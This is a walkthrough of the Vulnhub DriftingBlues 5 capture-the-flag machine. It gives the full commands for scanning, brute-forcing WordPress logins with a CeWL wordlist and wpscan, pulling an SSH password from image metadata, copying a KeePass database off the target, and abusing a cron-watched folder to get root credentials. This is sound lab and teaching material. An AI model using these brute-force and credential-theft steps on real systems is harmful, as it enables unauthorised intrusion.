Vulnhub – Driftingblues 5 – Walkthrough – Writeup

We are going to look into an easy machine of Vulnhub, Driftingblues5. Also, we have completed four machines from the series. So, make sure you check them out.

Vulnhub – Driftingblues 4 – Walkthrough

Driftingblues 5: https://www.vulnhub.com/entry/driftingblues-5,662/

Foothold

Firstly, we are going to identify the ip address of the target. We can use fping or netdiscover for the purpose.

fping -aqg 10.0.2.0/24

Secondly, we can do port scanning using nmap.

ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.13 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) && nmap -p$ports -sC -sV 10.0.2.13

It looks like we have got a wordpress website to enumerate. For that we can use wpscan.

wpscan --url http://10.0.2.13 --detection-mode aggressive -e --passwords=/home/kali/rockyou.txt

For an easy challenge like driftingblues, we got 5 users. Moreover, if we are using rockyou.txt wordlist, it would take so much time to complete. In this case, we are not going to pursue it. However, I am sure, we would get a valid password even if we had used it.

A point to note that driftingblues is a series of challenges. Since we have already covered some basic tools in previous challenges, I suppose the creator is trying to use a different approach. One of the important cues in CTF challenges is the information hidden in the website or the server somewhere. In this case, I ran gobuster to find any possible files. However, I had no luck. So, the only thing remaining is to generate a wordlist from the wordpress application. So, we have got the CeWL tool for this purpose.

cewl -m 6 -w drift.txt http://10.0.2.13

Since the wordpress requires a minimum of 6 digit password, we are going the same value in our command. Finally, we are storing the words in a file called drift.txt. Also, by default, the level of depth of recursion is 2. If the wordlist doesn’t work, we will increase it by one and regenerate the list.

After the file is generated, we are going to run the previous wpscan commands changing the wordlist file.

wpscan --url http://10.0.2.13 --detection-mode aggressive -e u -P drift.txt 

We got a valid combination for the user gill and the brute-force ran for more than 3 minutes. Now, when I logged in to the website, I found out that the user isn’t an admin. Hence, we cannot edit code to add a reverse shell. We are further going to enumerate wordpress.

When I went through the media, I found out that the boxed image is not present in any of the blog post. So, maybe that has some exif tags. Hence, we are going to download the file.

exiftool dblogo.png 

So, it looks like we got the password. However, there is an extra information that the password may not be in lowercase. Hence, we are going to first try the password in lowercase and if it doesn’t work then we are going to create own wordlist using hashcat rules.

ssh gill@10.0.2.13

We got the shell and there isn’t a need to generate own wordlist.

So, we got our user and its flag.

Privilege Root

ls -al
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null # search for suid binaries

I ran a python http server on the target and downloaded the keepas file to my local machine.

On target machine:

python3 -m http.server 8080

On local machine:

wget http://10.0.2.13:8080/keyfile.kdbx

Then, we have a tool called keepass2john to get hash of the master password of the keepass database.

keepass2john keyfile.kdbx | tee hash

I tried switching to root user using the password but it didn’t work. So, I will be using a keepass service and see the passwords stored.

Link to upload keepass db: https://app.keeweb.info/

There are some possible candidates for the keys. Hence, I tried all of these for root password but none of them work.

Now, I will be doing linux enumeration using linpeas.sh. Please view previous blogs for how to do it.

./linpeas.sh | tee output | more

There is an unexpected item in the root folder. Also, we got some files modified in the last 5 minutes which are related to authentication and keys. So, there is a possibility of cron job running a few minutes. Hence, we are going to use pspy to snoop the processes.

ls -al /

We found out that the other users than root can write on the directory.

Meanwhile, we can run pspy on another window.

./pspy64

I have put the keys in a newfile in each line so that I can run a command to create files with the credentials’ text.

nano keys
# put keys here

# run a command to touch files
while read key; do touch $key ;done < keys

And we created blank files with names as the keys. Now, we are going to wait for next cron job.

After the command is executed by cron job, we are going to list the files in the keyfolder. However, nothing happened in the directory. So, it means we might have to keep one one file in the directory. Let’s move the keys file to another directory and run the previous command there and copy those files one by one waiting for the cron job.

mv keys /tmp/
rm *
cd /tmp
while read key; do touch $key ;done < keys

# attempt 1
mv 2real4surreal /keyfolder/ 
ls -al /keyfolder # not successful
rm /keyfolder/*

# attempt 2
mv buddyretard /keyfolder/
ls -al /keyfolder # not successful
rm /keyfolder/*

# attempt 3
mv closet313 /keyfolder/
ls -al /keyfolder # not successful
rm /keyfolder/*

# attempt 4
mv exalted /keyfolder/
ls -al /keyfolder # not successful
rm /keyfolder/*

# attempt 5
mv fracturedocean /keyfolder/
ls -al /keyfolder # SUCCESSFUL
cd /keyfolder
cat rootcreds.txt

We actually got the root credentials from that file and hence the root flag as well.

su root
cd /root
ls -al
cat root.txt

Conclusion

This was a bit difficult challenge in my view. It had a lot of guessing games such as getting credentials from website, credentials from an image, ways to escalate the privileges, etc. Although frustrating the machine is quite good for learning.